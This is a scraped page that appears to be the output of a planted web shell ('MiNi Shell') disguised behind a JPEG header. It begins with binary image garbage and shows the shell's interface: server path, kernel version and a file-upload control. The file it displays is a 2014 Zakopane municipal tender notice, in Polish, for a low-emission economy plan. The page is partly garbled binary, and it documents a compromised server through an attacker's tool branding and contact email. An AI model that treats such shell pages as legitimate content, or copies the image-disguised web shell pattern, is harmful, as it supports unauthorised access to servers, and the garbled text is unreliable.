JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141127/389566-N-2014.html

<p class="kh_header"><b>Zakopane: BZP.271.95.2014 Opracowanie projektu Planu  Gospodarki  Niskoemisyjnej dla Gminy Miasta Zakopane wraz z realizacja procedury administracyjnej oraz aktualizacją Projektu założeń do planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe dla Miasta Zakopane na lata 2011-2026.</b><br>
<b>Numer ogłoszenia: 389566 - 2014; data zamieszczenia: 27.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zakopane.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.95.2014 Opracowanie projektu Planu  Gospodarki  Niskoemisyjnej dla Gminy Miasta Zakopane wraz z realizacja procedury administracyjnej oraz aktualizacją Projektu założeń do planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe dla Miasta Zakopane na lata 2011-2026..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  finansowanym z projektu Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej jako Instytucji Wdrażającej Priorytetu IX Infrastruktura energetyczna przyjazna środowisku i efektywność energetyczna Działanie 9.3 Termomodernizacja obiektów użyteczności publicznej, współfinansowane ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko 2007-2013, działając na podstawie Umowy z Ministrem Gospodarki, jest usługa polegająca na  wykonaniu: 
1) aktualizacji Projektu założeń do planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe dla Miasta Zakopane na lata 2011 - 2026 przyjętego uchwałą NR XVIII/260/2011 Rady Miasta Zakopane z dnia 30 listopada 2011 r.  (zwanej dalej Projektem założeń). Wykonawca  zapewnia, że wykonany przez niego Projekt założeń będzie spełniał warunki określone:
- zakresem, zaleceniami i wytycznymi dotyczącymi Konkursu nr 2/PO IiŚ/9.3/2013 Priorytet IX. Infrastruktura energetyczna przyjazna środowisku i efektywność energetyczna Działanie 9.3. Termomodernizacja obiektów użyteczności publicznej - plany gospodarki niskoemisyjnej, ogłoszonego  przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej, w szczególności z zapisami Załącznika nr 9 do Regulaminu Konkursu nr 2/PO IiŚ/9.3/2013.
- obowiązującymi przepisami prawa krajowego i wspólnotowego oraz spójny z innymi planami, programami i dokumentami strategicznymi na poziomie krajowym, wojewódzkim i gminnym

2) opracowania  projektu Planu Gospodarki Niskoemisyjnej dla Gminy Miasto Zakopane na lata 2015 - 2020 z uwzględnieniem ograniczenia niskiej emisji (zwanego dalej PGN) spójnego z zapisami Projektu założeń, w ramach którego  Wykonawca  sporządzi m. in.: 
2.1) Bazę danych dotyczącą gospodarki energią w sektorach i obiektach oraz inwentaryzację emisji gazów cieplarnianych i zużycia energii - zawierających wyselekcjonowane i usystematyzowane informacje pozwalające na ocenę gospodarki energią, która dotyczy emisji  punktowej, liniowej i niezorganizowanej - napływowej. 
Utworzona baza  danych będzie zawierała informacje co najmniej o: 
- budynkach użyteczności publicznej (rodzaj paliwa, zużycie i koszty paliwa, energii elektrycznej, ciepła, wody, stan docieplenia budynku /strop, ściany, okna i drzwi/, źródle ciepła ), 
- grupach budynków mieszkalnych (parametry j. w.), 
- grupach budynków usługowych (parametry j. w.),
- transporcie publicznym i prywatnym (rodzaj środków transportu, ilość pojazdów, charakterystyka, koszty paliwa, długość tras komunikacyjnych itp.),
- oświetleniu ulicznym (ilość, charakterystyka, zużycie energii, koszty),
- przemyśle (zużycie paliw, zużycie podstawowych surowców i energii elektrycznej),
- energetyce (źródła energii - charakterystyka istniejących w mieście większych źródeł energii tj. o mocy powyżej 1MW, - moc, paliwo, lokalizacja)
- istniejących instalacjach odnawialnych źródeł energii (lokalizacja, charakterystyka, moc, rodzaj),
- rolnictwie i leśnictwie (powierzchnia, rodzaj upraw, średnioroczne zużycie nawozów i środków ochrony roślin),
- gospodarce odpadami (ilość odpadów, ich rodzaj, sposób zagospodarowania),
- planowanych do realizacji działaniach i ich spodziewanych efektach,
 -ocenie poziomu zainteresowania respondentów skorzystaniem z instrumentów finansowych oferowanych przez Miasto Zakopane, przez Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej oraz w ramach Małopolskiego Regionalnego Programu Operacyjnego na wymianę źródeł ciepła (Wykonawca powinien poddać te dane analizie i odpowiedzieć na pytanie, czy warunki finansowe są atrakcyjne dla gospodarstw domowych oraz jaki procent respondentów rozważa wymianę źródła ciepła w okresie obowiązywania PGN. Wykonawca powinien ocenić, czy oferowane instrumenty finansowe pozwolą na osiągnięcie celów zawartych w Wojewódzkim Programie Ochrony Powietrza oraz w PGN w odniesieniu do palenisk w gospodarstwach domowych zlokalizowanych w obrębie Zakopanego).
Wykonawca  opracuje bazę wraz z inwentaryzacją na podstawie danych pozyskanych z samodzielnie przeprowadzonego wywiadu w terenie, przy czym dla budynków mieszkalnych - dane należy zebrać w ilościach wskazanych w poniższej tabeli dla każdej jednostki bilansowej, o której mowa w Projekcie założeń do planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe dla Miasta Zakopane na lata 2011 - 2026: 

Jednostka bilansowa Ilość budynków do zinwentaryzowania
ZI - 100
ZII - 100
ZIII - 300
ZIV - 100
ZV - 80
ZVI - 40
ZVII - 80
ZVIII - 100
ZIX - 100
Suma - 1000




Opis przedmiotu zamówienia:

Wykonawca  podejmuje się wykonania dokumentacji stanowiących Projekt założeń i PGN opracowanych dla granic administracyjnych Gminy Miasto Zakopane, na które składać się będą część opisowa (tekstowa) oraz załączniki w postaci map obrazujących m.in.  punkty emisji, obszary o znacznym nasileniu emitorów, występowanie oraz kierunki rozwoju sieci.

W ramach realizacji zamówienia  Wykonawca  zobowiązany jest w szczególności do:
1) opracowania bazy danych - 3 egzemplarze w wersji papierowej i 2 egzemplarze na nośniku elektronicznym w formie aktywnego arkusza kalkulacyjnego z założeniami, wyliczeniami i ich zestawionymi wynikami.
2) opracowania roboczych wersji Projektu założeń i PGN;
3) dokonania prezentacji oraz przeprowadzenia konsultacji roboczej wersji Projektu założeń i PGN z  Zamawiającym  oraz uwzględnienia przekazanych pisemnie przez Zamawiającego  po prezentacji uwag i zastrzeżeń. Dla celów dokonania prezentacji Wykonawca przygotuje i przedłoży Zamawiającemu  (w terminie 7 dni roboczych przed prezentacją) 3 egzemplarze roboczej wersji Projektu założeń i PGN oraz 2 egzemplarze w/w opracowań na nośniku elektronicznym (CD-ROM) 
4) przeprowadzenia konsultacji społecznych w ramach opracowywanych Projektu założeń i PGN oraz przeprowadzenia ogólnodostępnej prezentacji roboczej w/w opracowań. Wykonawca uwzględni wyniki konsultacji społecznych w dalszych pracach nad dokumentami.                          W szczególności Wykonawca zobowiązany jest do przedłożenia przed przeprowadzeniem konsultacji społecznych po 5 egzemplarzy roboczej wersji Projektu założeń i PGN oraz po 2 egzemplarze na nośniku elektronicznym (CD-ROM).
5)  przedłożenia Zamawiającemu 3 egz. ostatecznej wersji poprawionej Projektu założeń i PGN oraz 2 egz. na nośniku elektronicznym. 
6)  przygotowania i przedłożenia Samorządowi Województwa Małopolskiego poprawionej wersji Projektu założeń i uzyskania pozytywnej opinii Samorządu Wojewódzkiego dla przedłożonego dokumentu. 
7) przeprowadzenia procedury strategicznej oceny oddziaływania na środowisko dla Projektu założeń i PGN (na  podstawie art. 55 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2013 r.  poz. 1235 ze zm.) - w przypadku stwierdzenia przez organy opiniujące, konieczności jej przeprowadzenia), w tym:
7.1) przygotowanie wystąpień do właściwych organów w sprawie uzgodnień dot. strategicznej oceny oddziaływania na środowisko oraz dot. podsumowania,
7.2) sporządzenie prognozy oddziaływania na środowisko skutków realizacji Projektu założeń i PGN - przy konieczności przeprowadzenia strategicznej oceny oddziaływania na środowisko, 
7.3) wprowadzanie ewentualnych zmian do Projektu założeń i PGN wynikających z przeprowadzonych konsultacji społecznych i opinii właściwych organów.
8) opracowania finalnej wersji Projektu założeń oraz PGN po uwzględnieniu wyników konsultacji z Burmistrzem Miasta Zakopane, konsultacji społecznych oraz opinii Samorządu Wojewódzkiego. 
9) przedłożenie finalnej wersji Projektu założeń oraz PGN do zaakceptowania Zleceniodawcy,
10) udziału i składania wyjaśnień odnośnie finalnej wersji Projektu założeń i PGN na komisjach i sesji Rady Miasta Zakopane, na których będą opiniowane uchwały odnośnie przyjęcia w/w dokumentów.
11) przedłożenia Zamawiającemu finalnej wersji Projektu założeń i PGN po uprzednim zaakceptowaniu w/w dokumentów bez zastrzeżeń - w postaci:
9.1)  5 papierowych egzemplarzy części tekstowej Projektu założeń i PGN w formacie A4 wraz z   załącznikami w postaci map.
9.2)   20 egzemplarzy części tekstowej Projektu założeń i PGN na nośniku elektronicznym wraz z załącznikami w postaci map (CD-ROM)
12)  przekazania Zamawiającemu Projektu założeń i PGN na nośniku CD-ROM w ogólnie stosowanym formacie zapisu danych z możliwością ich edycji. Rysunki powinny być umieszczone na nośniku CD w formacie umożliwiającym, co najmniej ich podgląd a w przypadku PGN ich edycję.
13)  przekazania Zamawiającemu wraz z finalną wersją Projektu założeń i PGN - podpisanego oświadczenia, którego wzór stanowi załącznik nr 2 do umowy. 
14)  zorganizowania cyklu dwóch szkoleń dla wytypowanych przez Zamawiającego ok. 25 uczestników, poświęconych zakresowi założeń oraz wprowadzeniu i przygotowaniu uczestników do realizacji PGN i jego dalszego monitorowania. Szkolenia te odbędą się w siedzibie Urzędu Miasta Zakopane w udostępnionej na ten cel przez Zamawiającego  sali w godzinach pracy Urzędu w terminie wzajemnie ustalonym z 2-tygodniowym wyprzedzeniem, z czego:
- szkolenie pierwsze: czas trwania 3 - 4 godz.  winno odbyć się w I kwartale 2015 r.
- szkolenie drugie : czas trwania 3 - 4 godz.  w II kwartale 2015 r.
  Wykonawca  samodzielnie zorganizuje i na własny koszt przygotuje wszelkie materiały szkoleniowe, które zostaną przekazane uczestnikom szkolenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.72.00.00-0, 80.00.00.00-4, 48.60.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

             Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane 
             dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy, to w tym okresie - wykonał dla miast powyżej 15 000 mieszkańców: 
1. Co najmniej dwa dowolne z poniżej podanych opracowań:
- Program Gospodarki Niskoemisyjnej
- Program Ograniczenia Niskiej Emisji
- Projekt założeń do planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe
2. Co najmniej jedną bazę danych w zakresie gospodarki niskoemisyjnej. 
z załączeniem dowodów potwierdzających , że wykazane usługi zostały wykonane należycie.

Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

             Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane 
             dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

             Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane 
             dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

             Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane 
             dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga aby wykonawca załączył do oferty  wypełniony   swoimi terminami Harmonogram  będący  załącznikiem  nr 1 do wzoru umowy uwzględniając  terminy określone  we wzorze umowy dla czynności  przypisanych zamawiającemu  .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania  zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje możliwość zmiany umowy w następujących przypadkach: 

 a) w przypadku udokumentowanego niezawinionego przez Wykonawcę przedłużenia się procedur administracyjnych, na etapie uzyskiwania decyzji, opinii i uzgodnień oraz podjecia Uchwały przez Radę Miasta Zakopane,

b) konieczność dostosowania postanowień umowy do zmiany przepisów prawa, mających wpływ na wykonywanie przedmiotu zamówienia
 
W przypadku wystąpienia okoliczności wymienionych w pkt a)  termin wykonania przedmiotu umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia ich wykonania, nie dłużej jednak niż o okres trwania tych okoliczności. 

 W przypadku wystąpienia okoliczności wymienionej w pkt b) odpowiednie zapisy umowne zostaną dostosowane do obowiązujących przepisów prawa. 

c) ustawowych zmian stawek podatku VAT w  trakcie obowiązywania umowy  -zamawiający  dopuszcza zmianę cen wyłącznie w przypadku ustawowej zmiany stawki podatku VAT, przy czym zmianie ulegną  wyłącznie  ceny    brutto podane  w ofercie wykonawcy , ceny   netto pozostaną   bez zmian.
 
Wszystkie zmiany umowy dokonywane będą w formie pisemnej i muszą być podpisane przez upoważnionych przedstawicieli obu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia publiczne postępowania poniżej wartości art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Ochrony
Środowiska Urząd Miasta Zakopane ul. Kościuszki 13 34-500 Zakopane..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2014 godzina 12:00, miejsce: Biuro zamówień publicznych pok.8 Urząd Miasta Zakopane ul. Kościuszki 13 34-500
Zakopane..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin wykonania zamówienia: 1)Przedłożenie opracowania : nie później niż do
dnia 05.06.2015 r. 2)Czynności związane z udziałem w procesie podjęcia Uchwały: do 31.07.2015 r.
Opracowanie Planu Gospodarki Niskoemisyjnej dla Gminy Miasto Zakopane POIS.09.03.00-00-109/13
projekt współfinansowany ze środków Unii Europejskiej Europejskiego Funduszu Spójności w ramach
Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 IX osi priorytetu POIiŚ, Działanie 9.3.
Termomodernizacja obiektów użyteczności publicznej- plany gospodarki niskoemisyjnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com